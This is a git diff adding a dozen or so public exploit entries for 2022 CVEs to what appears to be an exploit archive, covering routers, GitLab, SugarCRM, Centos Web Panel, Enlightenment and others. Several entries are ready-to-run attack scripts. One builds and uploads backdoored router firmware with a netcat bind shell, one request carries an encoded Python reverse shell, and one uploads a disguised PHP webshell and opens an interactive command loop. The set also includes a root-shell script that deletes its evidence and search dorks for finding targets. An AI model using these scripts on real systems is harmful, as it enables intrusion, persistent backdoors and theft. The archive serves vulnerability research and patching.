diff --git a/exploits/aspx/webapps/51200.txt b/exploits/aspx/webapps/51200.txt new file mode 100644 index 000000000..a5b415a8a --- /dev/null +++ b/exploits/aspx/webapps/51200.txt @@ -0,0 +1,19 @@ +# Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS) +# Date: 12/09/2022 +# Exploit Author: Rob, CTRL Group +# Vendor Homepage: marigroup.com +# Version: V3.3.3 and under +# Tested on: Windows IIS all versions +# CVE : CVE-2022-35543 + +“Stored Cross-Site Scripting” Vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication however, once the payload is stored, any user visiting the portal will trigger the alert. + +Login to the appplication + +Browse to "Settings" tab and tehn " Wards". Create a new word with the following payload at the ward name: + + + + + +Any user browsing the application will trigger the payload. \ No newline at end of file diff --git a/exploits/hardware/remote/51190.txt b/exploits/hardware/remote/51190.txt new file mode 100644 index 000000000..673f95ac7 --- /dev/null +++ b/exploits/hardware/remote/51190.txt @@ -0,0 +1,71 @@ +Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion + + +Vendor: Hughes Network Systems, LLC +Product web page: https://www.hughes.com +Affected version: HX200 v8.3.1.14 + HX90 v6.11.0.5 + HX50L v6.10.0.18 + HN9460 v8.2.0.48 + HN7000S v6.9.0.37 + +Summary: The HX200 is a high-performance satellite router designed to +provide carrier-grade IP services using dynamically assigned high-bandwidth +satellite IP connectivity. The HX200 satellite router provides flexible +Quality of Service (QoS) features that can be tailored to the network +applications at each individual remote router, such as Adaptive Constant +Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter +bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing. +With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT, +and DNS Server/Relay functionality, together with a high-performance +satellite modem, the HX200 is a full-featured IP Router with an integrated +high-performance satellite router. The HX200 enables high- performance +IP connectivity for a variety of applications including cellular backhaul, +MPLS extension services, virtual leased line, mobile services and other +high-bandwidth solutions. + +Desc: The router contains a cross-frame scripting via remote file inclusion +vulnerability that may potentially be exploited by malicious users to compromise +an affected system. This vulnerability may allow an unauthenticated malicious +user to misuse frames, include JS/HTML code and steal sensitive information +from legitimate users of the application. + +Tested on: WindWeb/1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5743 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php + + +23.12.2022 + +-- + + +snippet:///XFSRFI +// +// Hughes Satellite Router RFI/XFS PoC Exploit +// by lqwrm 2022 +// + +//URL http://TARGET/fs/dynaform/speedtest.html +//Reload target +//window.location.reload() + +console.log("Loading Broadband Satellite Browsing Test"); + +//Add cross-frame file include (http only) +AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg"); + +console.log("Calling StartTest()"); +StartTest() + +//console.log("Calling DoTest()"); +//DoTest() + +//Unload weapon +//document.getElementById("URLList").remove(); \ No newline at end of file diff --git a/exploits/hardware/remote/51192.py b/exploits/hardware/remote/51192.py new file mode 100755 index 000000000..238194983 --- /dev/null +++ b/exploits/hardware/remote/51192.py @@ -0,0 +1,199 @@ +# !/usr/bin/python3 + +# Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Tobias Müller +# Date: 2022-12-01 +# Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329 +# Vendor Homepage: https://www.tp-link.com/ +# Tested On: TP-Link TL-WR902AC +# Vulnerability Description: Remote Code Execution via importing malicious firmware file +# CVE: CVE-2022-48194 +# Technical Details: https://github.com/otsmr/internet-of-vulnerable-things + +TARGET_HOST = "192.168.0.1" +ADMIN_PASSWORD = "admin" +TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip" + + +import requests +import os +import glob +import subprocess +import base64, os, hashlib +from Crypto.Cipher import AES, PKCS1_v1_5 # pip install pycryptodome +from Crypto.PublicKey import RSA +from Crypto.Util.Padding import pad + + + +for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]: + if "not found" in subprocess.check_output(["which", program]).decode(): + print(f"[!] need {program} to run") + exit(1) + + +class WebClient(object): + + def __init__(self, host, password): + + self.host = "http://" + host + self.password = password + self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest() + + self.aes_key = "7765636728821987" + self.aes_iv = "8775677306058909" + + self.session = requests.Session() + + crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text + + self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16) + self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16) + self.seq = int(crypto_data.split("\n")[3].split('"')[1]) + + self.jsessionid = self.get_jsessionid() + + + def get_jsessionid(self): + post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n" + self.get_encrypted_request_data(post_data, True) + return self.session.cookies["JSESSIONID"] + + def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): + cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8')) + plaintext_padded = pad(plaintext, aes_block_size) + return cipher.encrypt(plaintext_padded) + + def rsa_encrypt(self, n, e, plaintext): + public_key = RSA.construct((n, e)).publickey() + encryptor = PKCS1_v1_5.new(public_key) + block_size = int(public_key.n.bit_length() / 8) - 11 + encrypted_text = '' + for i in range(0, len(plaintext), block_size): + encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex() + return encrypted_text + + def get_encrypted_request_data(self, post_data, is_login: bool): + + encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8')) + encrypted_data = base64.b64encode(encrypted_data).decode() + + self.seq += len(encrypted_data) + signature = f"h={self.password_hash}&s={self.seq}" + if is_login: + signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature + + encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8')) + + body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n" + + return self.cgi_basic("_gdpr", body) + + def cgi_basic(self, url: str, body: str): + + res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={ + "Referer": "http://192.168.0.1/" + }) + + if res.status_code != 200: + print(res.text) + raise ValueError("router not reachable") + + return res + + +def cmd(command): + print("[*] running " + command) + os.system(command) + +def build_backdoor(): + + if os.path.isdir("./tp_tmp"): + cmd("rm -r -f ./tp_tmp") + + os.mkdir("./tp_tmp") + os.chdir('./tp_tmp') + + print("[*] downloading firmware") + res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD) + with open("firmware.zip", "wb") as f: + f.write(res.content) + + print("[*] downloading netcat") + + #res = requests.get(NETCAT_PRECOMPILED_FILE) + #with open("netcat", "wb") as f: + # f.write(res.content) + + if os.path.isfile("netcat"): + print("[!] netcat not found") + exit() + + cmd('unzip firmware.zip') + filename = glob.glob("TL-*.bin")[0] + cmd(f"mv '{filename}' firmware.bin") + cmd('binwalk --dd=".*" firmware.bin') + cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200') + + with open("./squashfs-root/etc/init.d/back", "w") as f: + f.write(""" +#!/bin/sh +while true; +do + netcat -l -p 3030 -e /bin/sh + sleep 5 +done +""") + + cmd("chmod +x ./squashfs-root/etc/init.d/back") + + with open("./squashfs-root/etc/init.d/rcS", "r+") as f: + + content = f.read() + content = content.replace("cos &", "/etc/init.d/back &\ncos &") + f.write(content) + + cmd("cp netcat ./squashfs-root/usr/bin/") + cmd("chmod +x ./squashfs-root/usr/bin/netcat") + + cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144") + + size = subprocess.check_output(["file", "backdoor.squashfs"]).decode() + offset = int(size.split(" ")[9]) + 1442304 + cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304") + cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304") + cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}") + + os.chdir('../') + + cmd(f"mv ./tp_tmp/backdoor.bin .") + cmd("rm -r -f ./tp_tmp") + +def upload_backdoor(): + + wc = WebClient(TARGET_HOST, ADMIN_PASSWORD) + + print("[*] uploading backdoor") + + files = { + 'filename': open('backdoor.bin','rb') + } + + re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={ + "JSESSIONID": wc.jsessionid + }, headers={ + "Referer": "http://192.168.0.1/mainFrame.htm" + }, files=files) + + if re_upload.status_code != 200 or "OK" not in re_upload.text: + print("[!] error") + exit(1) + + print("[*] success!") + + print("\nWait for router restart, then run:") + print("nc 192.168.0.1 3030") + + +build_backdoor() +upload_backdoor() \ No newline at end of file diff --git a/exploits/hardware/remote/51195.py b/exploits/hardware/remote/51195.py new file mode 100755 index 000000000..ddea2e1bb --- /dev/null +++ b/exploits/hardware/remote/51195.py @@ -0,0 +1,42 @@ +# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio= +n (RCE) (Authenticated) +# Date: 19/10/2022 +# Exploit Author: Yerodin Richards +# Vendor Homepage: https://www.nexxtsolutions.com/ +# Version: 42.103.1.5095 +# Tested on: ARN02304U8 +# CVE : CVE-2022-44149 + +import requests +import base64 + +router_host =3D "http://192.168.1.1" +username =3D "admin" +password =3D "admin" + + +def main(): + send_payload("&telnetd") + print("connect to router using: `telnet "+router_host.split("//")[1]+ "= +` using known credentials") + pass + +def gen_header(u, p): + return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii") + +def get_cookie(header): + url =3D router_host+"/login" + params =3D {"arg":header, "_n":1} + resp=3Drequests.get(url, params=3Dparams) + =20 +def send_payload(payload): + url =3D router_host+"/goform/sysTools" + headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa= +ssword))} + params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK= +"} + requests.post(url, headers=3Dheaders, data=3Dparams) + + +if __name__ =3D=3D '__main__': + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/51179.txt b/exploits/hardware/webapps/51179.txt new file mode 100644 index 000000000..f25ee9a35 --- /dev/null +++ b/exploits/hardware/webapps/51179.txt @@ -0,0 +1,72 @@ +# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass +# Device name: GV-ADR2701 +# Date: 26 December , 2020 +# Exploit Author: Chan Nyein Wai +# Vendor Homepage: https://www.geovision.com.tw/ +# Software Link: https://www.geovision.com.tw/download/product/ +# Firmware Version: V1.00_2017_12_15 +# Tested on: windows 10 + +# Exploitation +1. Capture The Login Request with burp, Do intercept request to response + +Request: +``` +PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1 +Host: 10.10.10.10 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) +Gecko/20100101 Firefox/84.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA== +Content-Length: 46 +Origin: http://10.10.10.10 +Connection: close +Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0 +Cookie: isAutoStartVideo=1 + +{"UserName":"admin","Password":"0X]&0D]]05"} +``` + +2. The following is the normal response when you login to the server. +``` +HTTP/1.1 200 Ok +Content-Length: 170 +Content-Type: text/plain +Connection: close +X-Frame-Options: SAMEORIGIN + +{ +"Response": { +"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login", +"CreatedID": -1, +"StatusCode": 460, +"StatusString": "PasswdError", +"Data": "null" +} +} +``` + +By editing the response to the following, you can successfully log in to +the web application. + +``` +HTTP/1.1 200 Ok +Content-Length: 170 +Content-Type: text/plain +Connection: close +X-Frame-Options: SAMEORIGIN + +{ +"Response": { +"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login", +"CreatedID": -1, +"StatusCode": 0, +"StatusString": "Succeed", +"Data": "null" +} +} +``` \ No newline at end of file diff --git a/exploits/java/remote/51183.txt b/exploits/java/remote/51183.txt new file mode 100644 index 000000000..7b86b70e0 --- /dev/null +++ b/exploits/java/remote/51183.txt @@ -0,0 +1,54 @@ +# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE) +# Exploit Author: Chan Nyein Wai & Thura Moe Myint +# Vendor Homepage: https://www.manageengine.com/products/ad-manager/ +# Software Link: https://www.manageengine.com/products/ad-manager/download.html +# Version: Ad Manager Plus Before 7122 +# Tested on: Windows +# CVE : CVE-2021-44228 +# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md + +### Description + +In the summer of 2022, I have been doing security engagement on Synack +Red Team in the collaboration with my good friend (Thura Moe Myint). +At that time, Log4j was already widespread on the internet. Manage +Engine had already patched the Ad Manager Plus to prevent it from +being affected by the Log4j vulnerability. They had mentioned that +Log4j was not affected by Ad Manager Plus. However, we determined that +the Ad Manager Plus was running on our target and managed to exploit +the Log4j vulnerability. + +### Exploitation + +First, Let’s make a login request using proxy. + +Inject the following payload in the ```methodToCall``` parameter in +the ```ADSearch.cc``` request. + +Then you will get the dns callback with username in your burp collabrator. + + + + +### Notes + +When we initially reported this vulnerability to Synack, we only +managed to get a DNS callback and our report was marked as LDAP +injection. However, we attempted to gain full RCE on the host but were +not successful. Later, we discovered that Ad Manager Plus was running +on another target, so we tried to get full RCE on that target. We +realized that there was a firewall and an anti-virus running on the +machine, so most of our payloads wouldn't work. After spending a +considerable amount of time , we eventually managed to bypass the +firewall and anti-virus, and achieve full RCE. + +### Conclusion + +We had already informed Zoho about the log4j vulnerability, and even +after it was fixed, they decided to reward us with a bonus bounty for +our report. + +### Mitigation + +Updating to a version of Ad Manager Plus higher than 7122 should +resolve the issue. \ No newline at end of file diff --git a/exploits/linux/local/51180.txt b/exploits/linux/local/51180.txt new file mode 100644 index 000000000..d42e63b5b --- /dev/null +++ b/exploits/linux/local/51180.txt @@ -0,0 +1,100 @@ +## Exploit Title: Enlightenment v0.25.3 - Privilege escalation +## Author: nu11secur1ty +## Date: 12.26.2022 +## Vendor: https://www.enlightenment.org/ +## Software: https://www.enlightenment.org/download +## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706 +## CVE ID: CVE-2022-37706 +## Description: +The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation. +Enlightenment_sys in Enlightenment before 0.25.3 allows local users to +gain privileges because it is setuid root, +and the system library function mishandles pathnames that begin with a +/dev/.. substring +If the attacker has access locally to some machine on which the +machine is installed Enlightenment +he can use this vulnerability to do very dangerous stuff. + +## STATUS: CRITICAL Vulnerability + +## Tested on: +```bash +DISTRIB_ID=Ubuntu +DISTRIB_RELEASE=22.10 +DISTRIB_CODENAME=kinetic +DISTRIB_DESCRIPTION="Ubuntu 22.10" +PRETTY_NAME="Ubuntu 22.10" +NAME="Ubuntu" +VERSION_ID="22.10" +VERSION="22.10 (Kinetic Kudu)" +VERSION_CODENAME=kinetic +ID=ubuntu +ID_LIKE=debian +HOME_URL="https://www.ubuntu.com/" +SUPPORT_URL="https://help.ubuntu.com/" +BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" +PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" +UBUNTU_CODENAME=kinetic +LOGO=ubuntu-logo +``` + +[+] Exploit: + +```bash +#!/usr/bin/bash +# Idea by MaherAzzouz +# Development by nu11secur1ty + +echo "CVE-2022-37706" +echo "[*] Trying to find the vulnerable SUID file..." +echo "[*] This may take few seconds..." + +# The actual problem +file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) +if [[ -z ${file} ]] +then + echo "[-] Couldn't find the vulnerable SUID file..." + echo "[*] Enlightenment should be installed on your system." + exit 1 +fi + +echo "[+] Vulnerable SUID binary found!" +echo "[+] Trying to pop a root shell!" +mkdir -p /tmp/net +mkdir -p "/dev/../tmp/;/tmp/exploit" + +echo "/bin/sh" > /tmp/exploit +chmod a+x /tmp/exploit +echo "[+] Welcome to the rabbit hole :)" + +${file} /bin/mount -o +noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), +"/dev/../tmp/;/tmp/exploit" /tmp///net + +read -p "Press any key to clean the evedence..." +echo -e "Please wait... " + +sleep 5 +rm -rf /tmp/exploit +rm -rf /tmp/net +echo -e "Done; Everything is clear ;)" + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706) +## Proof and Exploit: +[href](https://streamable.com/zflbgg) + +## Time spent +`01:00:00` + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/linux/webapps/51194.txt b/exploits/linux/webapps/51194.txt new file mode 100644 index 000000000..fb119528e --- /dev/null +++ b/exploits/linux/webapps/51194.txt @@ -0,0 +1,39 @@ +[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE) +[+] Centos Web Panel 7 - < 0.9.8.1147 +[+] Affected Component ip:2031/login/index.php?login=$(whoami) +[+] Discoverer: Numan Türle @ Gais Cyber Security +[+] Author: Numan Türle +[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194 +[+] CVE: CVE-2022-44877 + + +Description +-------------- +Bash commands can be run because double quotes are used to log incorrect entries to the system. + +Video Proof of Concept +-------------- +https://www.youtube.com/watch?v=kiLfSvc1SYY + + +Proof of concept: +-------------- +POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1 +Host: 10.13.37.10:2031 +Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82 +Content-Length: 40 +Origin: https://10.13.37.10:2031 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: https://10.13.37.10:2031/login/index.php?login=failed +Accept-Encoding: gzip, deflate +Accept-Language: en +Connection: close + +username=root&password=toor&commit=Login +-------------- + +Solution +-------- +Upgrade to CWP7 current version \ No newline at end of file diff --git a/exploits/multiple/webapps/51186.txt b/exploits/multiple/webapps/51186.txt new file mode 100644 index 000000000..5bc44adf4 --- /dev/null +++ b/exploits/multiple/webapps/51186.txt @@ -0,0 +1,23 @@ +Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF +Link: https://github.com/perfsonar/ +Affected Versions: v4.x <= v4.4.5 +Vulnerability Type: Partial Blind CSRF +Discovered by: Ryan Moore +CVE: CVE-2022-41413 +Summary + +A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR. + +This vulnerability was patched in perfSONAR v4.4.6. +Proof of Concept +Examples + +Here are two examples of this vulnerability. For further details, review the Technical Overview section below. +Example 1: + +Client browser connects to www.google.com in the background. +http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com +Example 2: + +Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint. +http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api \ No newline at end of file diff --git a/exploits/multiple/webapps/51193.py b/exploits/multiple/webapps/51193.py new file mode 100755 index 000000000..c97b584f2 --- /dev/null +++ b/exploits/multiple/webapps/51193.py @@ -0,0 +1,34 @@ +# Exploit Title: Apache 2.4.x - Buffer Overflow +# Date: Jan 2 2023 +# Exploit Author: Sunil Iyengar +# Vendor Homepage: https://httpd.apache.org/ +# Software Link: https://archive.apache.org/dist/httpd/ +# Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 +# Tested on: (Server) Kali, (Client) MacOS Monterey +# CVE : CVE-2021-44790 + + +import requests + +#Example "http(s):///process.lua" +url = "http(s):///" + +payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n" +headers = { + 'Content-Type': 'multipart/form-data; boundary=4' +} + +#Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1. +# But this has to match with the values in Payload. + +#Note2: The form data as shown above returns the response as "memory allocation error: block too big". +# But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows +# 3 more bytes during memset + +response = requests.request("POST", url, headers=headers, data=payload) + +print(response.text) + +#Response returned is +#

Error!

+#
memory allocation error: block too big
\ No newline at end of file diff --git a/exploits/php/webapps/51184.txt b/exploits/php/webapps/51184.txt new file mode 100644 index 000000000..23f956caa --- /dev/null +++ b/exploits/php/webapps/51184.txt @@ -0,0 +1,103 @@ +Exploit Title: XCMS v1.83 - Remote Command Execution (RCE) +Author: Onurcan +Email: onurcanalcan@gmail.com +Site: ihteam.net +Script Download : http://www.xcms.it +Date: 26/12/2022 + +The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms. +Taking "home.php" for example: + + + +So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel. +So let's take a look to the bugged code. + + + +So with a simple html form we can change the footer. +Ex: + +
+ + + +
+ + + Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials. + + + +Trick: We can change the admin panel password by inserting this code in the footer: + + "); + fclose($f); + ?> + +This code delete the old password file and then create a new one with your new password. + + +Fix: + + + +So this is a simple exploit: + + + + + + + +"; +}else{ +echo" +
+XCMS <= v1.82 Remote Command Execution Vulnerability
+Dork  :  inurl:\"mod=notizie\"
+by Onurcan
+Visit ihteam.net
+
+
+
+Site     :
+
+Code     :
+
+
+
+
+
"; +} +?> \ No newline at end of file diff --git a/exploits/php/webapps/51187.py b/exploits/php/webapps/51187.py new file mode 100755 index 000000000..c5f16e566 --- /dev/null +++ b/exploits/php/webapps/51187.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python + +# Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE) +# Exploit Author: sw33t.0day +# Vendor Homepage: https://www.sugarcrm.com +# Version: all commercial versions up to 12.2.0 + +# Dorks: +# https://www.google.com/search?q=site:sugarondemand.com&filter=0 +# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php +# https://www.shodan.io/search?query=http.title:"SugarCRM" +# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM" +# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com" + +import base64, re, requests, sys, uuid + +requests.packages.urllib3.disable_warnings() + +if len(sys.argv) != 2: + sys.exit("Usage: %s [URL]" % sys.argv[0]) + +print "[+] Sending authentication request" + +url = sys.argv[1] + "/index.php" +session = {"PHPSESSID": str(uuid.uuid4())} +params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1} + +requests.post(url, cookies=session, data=params, verify=False) + +print "[+] Uploading PHP shell\n" + +png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC" +upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml +params = {"module": "EmailTemplates", "action": "AttachFiles"} + +requests.post(url, cookies=session, data=params, files=upload, verify=False) + +url = sys.argv[1] + "/cache/images/sweet.phar" + +while True: + cmd = raw_input("# ") + res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False) + res = re.search("#####(.*)#####", res.text, re.DOTALL) + if res: + print res.group(1) + else: + sys.exit("\n[+] Failure!\n") \ No newline at end of file diff --git a/exploits/php/webapps/51198.txt b/exploits/php/webapps/51198.txt new file mode 100644 index 000000000..810004f8b --- /dev/null +++ b/exploits/php/webapps/51198.txt @@ -0,0 +1,34 @@ +# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) +# Google Dork: N/A +# Date: 2/1/2023 +# Exploit Author: Rian Saaty +# Vendor Homepage: https://yui.github.io/yui2/ +# Software Link: https://yui.github.io/yui2/ +# Version: 2.8.2 +# Tested on: MacOS, WindowsOS, LinuxOS +# CVE : CVE-2022-48197 + + +The YUI2 has a lot of reflected XSS vulnerabilities in pretty much +most files. A sample of the vulnerable files along with the exploit +can be found here: + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E + +Twitter: @Ryan_412_ \ No newline at end of file diff --git a/exploits/ruby/webapps/51181.py b/exploits/ruby/webapps/51181.py new file mode 100755 index 000000000..98306e2d4 --- /dev/null +++ b/exploits/ruby/webapps/51181.py @@ -0,0 +1,607 @@ +# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) +# Date: 2022-12-25 +# Exploit Author: Antonio Francesco Sardella +# Vendor Homepage: https://about.gitlab.com/ +# Software Link: https://about.gitlab.com/install/ +# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1 +# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution) +# CVE: CVE-2022-2884 +# Category: WebApps +# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884 +# Credits: yvvdwf (https://hackerone.com/reports/1672388) + +# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884. + +# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, +# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution +# via the Import from GitHub API endpoint. + +# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/ + +# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments. +# Please use this tool responsibly. I do not take responsibility for the way in which any one uses +# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool. + +import argparse +import logging +import validators +import random +import string +import requests +import time +import base64 +import sys + +from flask import Flask, current_app, request +from multiprocessing import Process + +VERSION = "v1.0 (2022-12-25)" +DEFAULT_LOGGING_LEVEL = logging.INFO +app = Flask(__name__) + +def parse_arguments(): + parser = argparse.ArgumentParser( + description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}" + ) + parser.add_argument("-u", "--url", 